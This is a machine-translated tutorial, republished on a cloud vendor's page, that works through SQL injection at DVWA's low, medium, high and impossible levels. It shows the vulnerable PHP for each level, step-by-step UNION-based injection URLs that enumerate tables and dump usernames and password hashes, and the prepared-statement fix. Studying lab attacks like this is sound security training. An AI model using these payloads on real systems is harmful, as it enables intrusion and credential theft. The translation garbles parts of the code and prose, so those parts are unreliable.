Home > Others

"DVWA" "SQL Injection" SQL injection low Medium high impossible

Source: Internet
Author: User
Tags mysql client php source code
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >

1. low.php of primary articles

First look at the source code, the parameters obtained directly into the SQL statement execution

if isset $_request [' Submit ' ])) {    //  Get input    $id $_request [' ID ' ];     // Check Database    $query  = "Select First_Name, last_name from users WHERE user_id = '$id';";

http://localhost/dvwa-master/vulnerabilities/sqli/?id=1&submit=Submit#

Direct quotation of the newspaper is wrong, through the error message is easy to use single quotation marks to close

http://localhost/DVWA-master/vulnerabilities/sqli/?id=1 '&submit=Submit#
inch Check  to  for  Right  to  Use "' 1 " " At line 1

Use order by to guess the number of fields

http://localhost/DVWA-master/vulnerabilities/sqli/?id=1 ' ORDER by 3%23&submit=Submit #

Order by 2 o'clock page Normal

Union select query User () database ()

Http://localhost/DVWA-master/vulnerabilities/sqli/?id=1 ' Union Select User (), database ()%23& Submit=Submit#

Check the table name

Http://localhost/DVWA-master/vulnerabilities/sqli/?id=0 ' union SELECT 1,GROUP_CONCAT (table_name) from Information_schema.tables where table_schema= ' Dvwa '%23&submit=Submit#

Check the Users table column name

Http://localhost/DVWA-master/vulnerabilities/sqli/?id=0 ' union select 1,GROUP_CONCAT (column_name) from Information_schema.columns where table_schema= ' Dvwa ' and table_name= ' users '%23&submit=Submit #

Check data

Http://localhost/DVWA-master/vulnerabilities/sqli/?id=0 ' union select User,password from Dvwa.users limit 0,1%23  &submit=Submit#

Decryption is available.

2. Intermediate article medium.php

To see the difference, the ID parameter is no longer used by $_request, and the mysql_real_escape_string () function is used to escape the special characters in the string used in the SQL statement.

if(isset($_post[' Submit ' ] ) ) {    //Get Input    $id=$_post[' ID ' ]; $id=mysqli_real_escape_string($GLOBALS["___mysqli_ston"],$id); $query= "Select First_Name, last_name from users WHERE user_id =$id;"; $result=Mysqli_query($GLOBALS["___mysqli_ston"],$query) or die(' <pre> '.Mysqli_error($GLOBALS["___mysqli_ston"]) . ' </pre> ');

The most direct effect is ' escaped as ', which makes it impossible for an attacker to close the quotes and not inject them.

If the MySQL client is encoded as GBK, a wide-byte injection is generated. Refer to Http://netsecurity.51cto.com/art/201404/435074.htm using https://www.cnblogs.com/superkrissV/p/8379690.html

If the ID parameter is integral type, because no closing quotation marks are required, the same can be injected normally, where the ID is an integer type

SELECT  from WHERE user_id = $id;

Use Hackbar plugin to submit post data, post form # do not encode into%23

Id=0 Union Select 1,2#&submit=Submit

Take the data as you would a primary article

Id=0 Union Select User,password from dvwa.users limit 0,1#&submit=Submit

3. Advanced Article high.php

The ID parameter is obtained from the session, because the session data is stored on the server side, many programmers will check the data from the client, and the data on the service side is considered secure

if(isset($_session[' ID ' ] ) ) {    //Get Input    $id=$_session[' ID ' ]; //Check Database    $query= "Select First_Name, last_name from users WHERE user_id = '$id' LIMIT 1; '; $result=Mysqli_query($GLOBALS["___mysqli_ston"],$query) or die(' <pre>something went wrong.</pre> ');

Click to pop up a page with the corresponding URL

http://localhost/DVWA-master/vulnerabilities/sqli/session-input.php

Review the source code

View session-input.php source code, you can find that the ID parameter has not been processed directly to the session

if isset $_post [' ID ' ])) {    $_session[' id '] =  $_post [' ID ' ];     // $page [' body ']. = "Session ID set!<br/><br/><br/>";    $page [' body ']. = "Session ID: {$_session[' id ']}<br/><br/><br/>";     $page [' body ']. = "<script>window.opener.location.reload (true);</script>";}

Understand these can be injected, injected page is session-input.php, display the results of the page is index.php

http://localhost/DVWA-master/vulnerabilities/sqli/session-input.php

Post Submission

Id=0 ' union select User,password from dvwa.users#&submit=Submit

Refresh

http://localhost/DVWA-master/vulnerabilities/sqli/index.php

4. Impossible article impossible.php

Viewing the source code, you can find the use of PDO technology to prevent SQL injection, bind ID to int

    $id=$_get[' ID ' ]; //Was a number entered?    if(Is_numeric($id )) {        //Check the database        $data=$db->prepare (' SELECT first_name, last_name from users WHERE user_id = (: id) LIMIT 1; ' ); $data->bindparam (': Id ',$idPdo::param_int); $data-execute (); $row=$data->fetch ();

"DVWA" "SQL Injection" SQL injection low Medium high impossible

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Related Keywords:
injection sql sql injection sql server advanced sql injection advanced sql injection tutorial codeigniter prevent sql injection codeigniter sql injection example common sql injection queries

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

What's Trending
Top 10 Tags
datastax versions naming convention zookeeper client class definition md5 microsoft sql server 2005 data structures exception handling error handling
Top 10 Keywords
microsoft download center down wordpress address url site address url wordpress address url windows installer 4 0 download 302 not found web address url definition site address url wordpress db2 integer mac os installation step by step pdf abbreviation for return

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More